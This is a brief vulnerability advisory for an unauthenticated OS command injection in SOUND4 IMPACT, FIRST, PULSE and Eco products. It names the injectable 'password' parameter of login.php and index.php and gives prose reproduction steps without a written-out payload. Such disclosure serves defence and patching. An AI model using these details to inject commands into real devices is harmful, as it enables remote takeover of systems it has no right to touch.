SOUND4 Impact, First, Pulse, and Eco Unauthenticated OS Command Injection Vulnerability

An unauthenticated OS command injection vulnerability has been identified in SOUND4 products, specifically in the IMPACT, FIRST, PULSE, and Eco versions through 2.x. This vulnerability allows remote attackers to execute arbitrary shell commands by injecting commands into the 'password' POST parameter of the login.php and index.php scripts. The commands are executed with the privileges of the web server.

Impact

Exploitation of this vulnerability allows for remote command execution on the server where the application is running.

Reproduction

To reproduce this vulnerability, send a POST request to 'login.php' or 'index.php' with the 'password' parameter containing the injected shell command. The command will be executed on the server, and the response can be used to verify the execution. For example, injecting a command to write the output of the 'id' command to a file can demonstrate successful exploitation.